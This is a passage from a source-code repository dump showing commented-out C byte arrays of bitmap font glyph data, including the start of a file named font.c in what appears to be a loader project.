0x00, 0x00, 0x00, 151 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 152 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 153 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 154 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 155 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 156 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 157 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 158 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 159 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 160 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 161 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 162 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 163 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 164 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 165 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 166 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 167 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 168 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 169 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 170 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 171 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 172 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 173 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 174 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 175 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 176 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 177 | // 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 178 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 179 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 180 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 181 | // 0xC0, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 182 | // 0x80, 0x03, 0x00, 0x00, 0x60, 0x00, 0x80, 0x01, 0x00, 0x03, 0x60, 0x00, 183 | // 0xC0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 184 | // 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 185 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 186 | // 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0xC0, 0x03, 0x60, 0x00, 0xC0, 0x03, 187 | // 0x00, 0x06, 0xC0, 0x03, 0xC0, 0x00, 0xC0, 0x07, 0x60, 0x00, 0x00, 0x00, 188 | // 0x00, 0x00, 0x60, 0x00, 0x80, 0x01, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x03, 189 | // 0xE0, 0x03, 0xC0, 0x07, 0xE0, 0x03, 0xC0, 0x07, 0xE0, 0x07, 0x60, 0x06, 190 | // 0x60, 0x06, 0x60, 0x0C, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x07, 0x80, 0x01, 191 | // 0x80, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x06, 192 | // 0xE0, 0x03, 0x60, 0x00, 0xC0, 0x07, 0x60, 0x06, 0xE0, 0x03, 0x60, 0x06, 193 | // 0xE0, 0x03, 0xC0, 0x01, 0x00, 0x03, 0x60, 0x03, 0x80, 0x01, 0xE0, 0x0F, 194 | // 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00, 195 | // 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0x60, 0x0D, 0xC0, 0x03, 0x60, 0x06, 196 | // 0x00, 0x03, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 197 | // 0x00, 0x00, 0xC0, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0xE0, 0x07, 198 | // 0xC0, 0x00, 0xC0, 0x07, 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0xE0, 0x01, 199 | // 0x80, 0x01, 0xE0, 0x0F, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 200 | // 0x60, 0x00, 0xC0, 0x03, 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x0F, 201 | // 0x80, 0x01, 0xC0, 0x07, 0x80, 0x01, 0x80, 0x00, 0x80, 0x00, 
0x80, 0x00, 202 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00, 203 | // 0x60, 0x06, 0x60, 0x00, 0xC0, 0x00, 0x00, 0x04, 0x60, 0x06, 0x80, 0x01, 204 | // 0x00, 0x03, 0x60, 0x03, 0x80, 0x01, 0x60, 0x0D, 0x60, 0x06, 0x60, 0x06, 205 | // 0xE0, 0x03, 0xC0, 0x07, 0x60, 0x00, 0x00, 0x06, 0x80, 0x01, 0x60, 0x06, 206 | // 0xC0, 0x03, 0xC0, 0x07, 0xC0, 0x03, 0x00, 0x06, 0xC0, 0x00, 0x40, 0x00, 207 | // 0x80, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x07, 208 | // 0xE0, 0x03, 0xC0, 0x03, 0xC0, 0x07, 0xC0, 0x03, 0xC0, 0x00, 0xC0, 0x03, 209 | // 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x01, 0x60, 0x06, 0xC0, 0x03, 0x60, 0x0C, 210 | // 0x60, 0x06, 0xC0, 0x03, 0x60, 0x00, 0x00, 0x06, 0x60, 0x00, 0xE0, 0x03, 211 | // 0x00, 0x07, 0xC0, 0x07, 0x80, 0x01, 0xC0, 0x06, 0x60, 0x06, 0xC0, 0x03, 212 | // 0xE0, 0x07, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 213 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 214 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 215 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 216 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 217 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 218 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 219 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 220 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 221 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 222 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 223 | // 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 224 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 225 | }; 226 | -------------------------------------------------------------------------------- 
/cn_qr_initial_loader/JPN/cn_initial/source/font.c: -------------------------------------------------------------------------------- 1 | // #include 2 | 3 | // // const u8 font_bin[2640] = { 4 | // const u8 __attribute__ ((section (".rodata"))) font_bin[] = { 5 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x1A, 6 | // 0x78, 0x60, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 7 | // 0x14, 0x7F, 0x7F, 0x14, 0x14, 0x7F, 0x7F, 0x14, 0x00, 0x12, 0x3A, 0x6B, 8 | // 0x6B, 0x2E, 0x24, 0x00, 0x00, 0x63, 0x66, 0x0C, 0x98, 0x33, 0x63, 0x00, 9 | // 0x00, 0x26, 0x7F, 0x59, 0x59, 0x77, 0x27, 0x05, 0x00, 0x10, 0x30, 0x60, 10 | // 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3C, 0x66, 0x42, 0x00, 0x00, 11 | // 0x00, 0x00, 0x42, 0x66, 0x3C, 0x18, 0x00, 0x00, 0x10, 0x54, 0x7C, 0x38, 12 | // 0x38, 0x7C, 0x54, 0x10, 0x00, 0x10, 0x10, 0x7C, 0x7C, 0x10, 0x10, 0x00, 13 | // 0x00, 0x00, 0x02, 0x0E, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x10, 0x10, 0x10, 14 | // 0x10, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x06, 0x00, 0x00, 0x00, 15 | // 0x00, 0x02, 0x06, 0x0C, 0x18, 0x30, 0x60, 0x00, 0x00, 0x3C, 0x7E, 0x4A, 16 | // 0x52, 0x7E, 0x3C, 0x00, 0x00, 0x02, 0x22, 0x7E, 0x7E, 0x02, 0x02, 0x00, 17 | // 0x00, 0x26, 0x4E, 0x4A, 0x52, 0x72, 0x22, 0x00, 0x00, 0x24, 0x46, 0x52, 18 | // 0x52, 0x7E, 0x2C, 0x00, 0x00, 0x18, 0x78, 0x68, 0x08, 0x7E, 0x7E, 0x08, 19 | // 0x00, 0x74, 0x76, 0x52, 0x52, 0x5E, 0x5C, 0x00, 0x00, 0x3C, 0x7E, 0x52, 20 | // 0x52, 0x5E, 0x0C, 0x00, 0x00, 0x40, 0x40, 0x4E, 0x7E, 0x70, 0x40, 0x00, 21 | // 0x00, 0x2C, 0x7E, 0x52, 0x52, 0x7E, 0x2C, 0x00, 0x00, 0x24, 0x76, 0x52, 22 | // 0x52, 0x7E, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x22, 0x22, 0x00, 0x00, 0x00, 23 | // 0x00, 0x00, 0x02, 0x2E, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3C, 0x24, 24 | // 0x66, 0x42, 0x42, 0x00, 0x00, 0x28, 0x28, 0x28, 0x28, 0x28, 0x00, 0x00, 25 | // 0x00, 0x42, 0x42, 0x66, 0x24, 0x3C, 0x18, 0x00, 0x00, 0x20, 0x60, 0x4A, 26 | // 0x5A, 0x70, 0x20, 0x00, 0x00, 0x3E, 0x7F, 0x41, 0x59, 
0x79, 0x3A, 0x00, 27 | // 0x00, 0x3E, 0x7E, 0x50, 0x50, 0x7E, 0x3E, 0x00, 0x00, 0x7E, 0x7E, 0x52, 28 | // 0x52, 0x7E, 0x2C, 0x00, 0x00, 0x3C, 0x7E, 0x42, 0x42, 0x66, 0x24, 0x00, 29 | // 0x00, 0x7E, 0x7E, 0x42, 0x66, 0x3C, 0x18, 0x00, 0x00, 0x7E, 0x7E, 0x52, 30 | // 0x52, 0x42, 0x42, 0x00, 0x00, 0x7E, 0x7E, 0x50, 0x50, 0x40, 0x00, 0x00, 31 | // 0x00, 0x3C, 0x7E, 0x42, 0x4A, 0x6E, 0x2C, 0x00, 0x00, 0x7E, 0x7E, 0x10, 32 | // 0x10, 0x7E, 0x7E, 0x00, 0x00, 0x00, 0x42, 0x7E, 0x7E, 0x42, 0x00, 0x00, 33 | // 0x00, 0x04, 0x06, 0x42, 0x7E, 0x7C, 0x40, 0x00, 0x00, 0x7E, 0x7E, 0x18, 34 | // 0x3C, 0x66, 0x42, 0x00, 0x00, 0x7E, 0x7E, 0x02, 0x02, 0x02, 0x02, 0x00, 35 | // 0x00, 0x7E, 0x7E, 0x30, 0x18, 0x30, 0x7E, 0x00, 0x00, 0x7E, 0x7E, 0x30, 36 | // 0x18, 0x7E, 0x7E, 0x00, 0x00, 0x3C, 0x7E, 0x42, 0x42, 0x7E, 0x3C, 0x00, 37 | // 0x00, 0x7E, 0x7E, 0x50, 0x50, 0x70, 0x20, 0x00, 0x00, 0x38, 0x7C, 0x44, 38 | // 0x46, 0x7E, 0x3A, 0x00, 0x00, 0x7E, 0x7E, 0x58, 0x5C, 0x76, 0x22, 0x00, 39 | // 0x00, 0x24, 0x76, 0x52, 0x4A, 0x6E, 0x24, 0x00, 0x00, 0x40, 0x40, 0x7E, 40 | // 0x7E, 0x40, 0x40, 0x00, 0x00, 0x7C, 0x7E, 0x02, 0x02, 0x7E, 0x7C, 0x00, 41 | // 0x00, 0x78, 0x7C, 0x06, 0x06, 0x7C, 0x78, 0x00, 0x00, 0x7E, 0x7E, 0x0C, 42 | // 0x18, 0x0C, 0x7E, 0x00, 0x00, 0x46, 0x6E, 0x38, 0x38, 0x6E, 0x46, 0x00, 43 | // 0x00, 0x60, 0x70, 0x1E, 0x1E, 0x70, 0x60, 0x00, 0x00, 0x46, 0x4E, 0x5A, 44 | // 0x72, 0x62, 0x42, 0x00, 0x00, 0x00, 0x7F, 0x7F, 0x41, 0x41, 0x00, 0x00, 45 | // 0x00, 0x40, 0x60, 0x30, 0x18, 0x0C, 0x06, 0x00, 0x00, 0x00, 0x41, 0x41, 46 | // 0x7F, 0x7F, 0x00, 0x00, 0x00, 0x10, 0x30, 0x60, 0x60, 0x30, 0x10, 0x00, 47 | // 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x40, 0x60, 48 | // 0x30, 0x10, 0x00, 0x00, 0x00, 0x04, 0x2E, 0x2A, 0x2A, 0x3E, 0x1E, 0x00, 49 | // 0x00, 0x7E, 0x7E, 0x12, 0x12, 0x1E, 0x0C, 0x00, 0x00, 0x1C, 0x3E, 0x22, 50 | // 0x22, 0x22, 0x00, 0x00, 0x00, 0x0C, 0x1E, 0x12, 0x12, 0x7E, 0x7E, 0x00, 51 | // 0x00, 0x1C, 0x3E, 0x2A, 0x2A, 0x3A, 0x18, 0x00, 0x00, 
0x10, 0x3E, 0x7E, 52 | // 0x50, 0x50, 0x00, 0x00, 0x00, 0x10, 0x3A, 0x2A, 0x2A, 0x3A, 0x3C, 0x00, 53 | // 0x00, 0x7E, 0x7E, 0x10, 0x10, 0x1E, 0x0E, 0x00, 0x00, 0x00, 0x12, 0x5E, 54 | // 0x5E, 0x02, 0x00, 0x00, 0x00, 0x02, 0x02, 0x02, 0x5E, 0x5C, 0x00, 0x00, 55 | // 0x00, 0x7E, 0x7E, 0x08, 0x1C, 0x16, 0x02, 0x00, 0x00, 0x00, 0x42, 0x7E, 56 | // 0x7E, 0x02, 0x00, 0x00, 0x00, 0x3E, 0x3E, 0x18, 0x1C, 0x38, 0x3E, 0x1E, 57 | // 0x00, 0x3E, 0x3E, 0x20, 0x20, 0x3E, 0x1E, 0x00, 0x00, 0x1C, 0x3E, 0x22, 58 | // 0x22, 0x3E, 0x1C, 0x00, 0x00, 0x3E, 0x3E, 0x24, 0x24, 0x3C, 0x18, 0x00, 59 | // 0x00, 0x18, 0x3C, 0x24, 0x24, 0x3E, 0x3E, 0x00, 0x00, 0x3E, 0x3E, 0x20, 60 | // 0x20, 0x30, 0x10, 0x00, 0x00, 0x12, 0x3A, 0x2A, 0x2A, 0x2E, 0x24, 0x00, 61 | // 0x00, 0x20, 0x20, 0x7C, 0x7E, 0x22, 0x22, 0x00, 0x00, 0x3C, 0x3E, 0x02, 62 | // 0x02, 0x3E, 0x3E, 0x00, 0x00, 0x38, 0x3C, 0x06, 0x06, 0x3C, 0x38, 0x00, 63 | // 0x00, 0x38, 0x3E, 0x0E, 0x1C, 0x0E, 0x3E, 0x38, 0x00, 0x22, 0x36, 0x1C, 64 | // 0x1C, 0x36, 0x22, 0x00, 0x00, 0x30, 0x3A, 0x0A, 0x0A, 0x3E, 0x3C, 0x00, 65 | // 0x00, 0x22, 0x26, 0x2E, 0x3A, 0x32, 0x22, 0x00, 0x00, 0x00, 0x04, 0x3B, 66 | // 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00, 0x00, 67 | // 0x00, 0x00, 0x20, 0x3B, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 68 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 69 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 70 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 71 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 72 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 73 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 74 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 75 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 76 | // // 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 77 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 78 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 79 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 80 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 81 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 82 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 83 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 84 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 85 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 86 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 87 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 88 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 89 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 90 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 91 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 92 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 93 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 94 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 95 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0xC0, 0x03, 96 | // // 0xE0, 0x03, 0xC0, 0x03, 0xE0, 0x01, 0xE0, 0x07, 0xE0, 0x03, 0xC0, 0x03, 97 | // // 0x60, 0x06, 0xC0, 0x03, 0x80, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x04, 98 | // // 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x03, 0xC0, 0x03, 0xE0, 0x03, 0xC0, 0x03, 99 | // // 0xE0, 0x07, 0x60, 0x06, 0x60, 0x06, 0x60, 0x04, 0x60, 0x06, 0x60, 0x06, 100 | // // 0xE0, 0x07, 0xC0, 0x03, 0x60, 
0x00, 0xC0, 0x03, 0x80, 0x01, 0x00, 0x00, 101 | // // 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x03, 0x60, 0x00, 102 | // // 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0x60, 0x03, 103 | // // 0x60, 0x00, 0xE0, 0x06, 0xE0, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 104 | // // 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0x60, 0x04, 105 | // // 0xC0, 0x03, 0x60, 0x06, 0x00, 0x03, 0xC0, 0x00, 0xC0, 0x00, 0x00, 0x03, 106 | // // 0xC0, 0x03, 0x00, 0x00, 0x60, 0x07, 0xE0, 0x07, 0xE0, 0x03, 0x60, 0x00, 107 | // // 0x60, 0x06, 0xE0, 0x01, 0xE0, 0x01, 0x60, 0x00, 0xE0, 0x07, 0x80, 0x01, 108 | // // 0x00, 0x03, 0xE0, 0x01, 0x60, 0x00, 0xE0, 0x07, 0xE0, 0x07, 0x60, 0x06, 109 | // // 0xE0, 0x03, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x00, 0x80, 0x01, 0x60, 0x06, 110 | // // 0x60, 0x06, 0x60, 0x05, 0x80, 0x01, 0xC0, 0x03, 0x80, 0x01, 0xC0, 0x00, 111 | // // 0x80, 0x01, 0x00, 0x03, 0x60, 0x06, 0x00, 0x00, 0x60, 0x07, 0x60, 0x06, 112 | // // 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0x60, 0x00, 0x60, 0x00, 0x60, 0x07, 113 | // // 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0xE0, 0x01, 0x60, 0x00, 0x60, 0x05, 114 | // // 0x60, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0xE0, 0x01, 0x00, 0x03, 115 | // // 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x07, 0xC0, 0x03, 0x80, 0x01, 116 | // // 0xC0, 0x00, 0xC0, 0x00, 0x00, 0x03, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 117 | // // 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x03, 0x60, 0x00, 118 | // // 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x60, 0x03, 0x60, 0x03, 119 | // // 0x60, 0x00, 0x60, 0x04, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00, 0xC0, 0x03, 120 | // // 0x60, 0x03, 0x60, 0x06, 0x80, 0x01, 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x06, 121 | // // 0x60, 0x06, 0x80, 0x01, 0x60, 0x00, 0xC0, 0x00, 0x00, 0x06, 0x00, 0x03, 122 | // // 0x00, 0x00, 0x00, 0x00, 0x60, 0x04, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x03, 123 | // // 0xE0, 0x01, 0xE0, 0x07, 0x60, 0x00, 0xC0, 0x03, 0x60, 0x06, 0xC0, 0x03, 124 | // // 0xC0, 0x01, 
0x60, 0x06, 0xE0, 0x07, 0x60, 0x04, 0x60, 0x06, 0xC0, 0x03, 125 | // // 0x60, 0x00, 0x00, 0x07, 0x60, 0x06, 0xC0, 0x03, 0x80, 0x01, 0xC0, 0x03, 126 | // // 0x80, 0x01, 0x60, 0x04, 0x60, 0x06, 0x80, 0x01, 0xE0, 0x07, 0xC0, 0x00, 127 | // // 0x00, 0x04, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x00, 0x00, 128 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 129 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 130 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 131 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 132 | // // 0x00, 0x00, 0xC0, 0x03, 0x00, 0x00, 0xC0, 0x03, 0x00, 0x00, 0xE0, 0x07, 133 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 134 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 135 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 136 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 137 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 138 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 139 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 140 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 141 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 142 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 143 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 144 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 145 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 146 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 147 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 148 | 
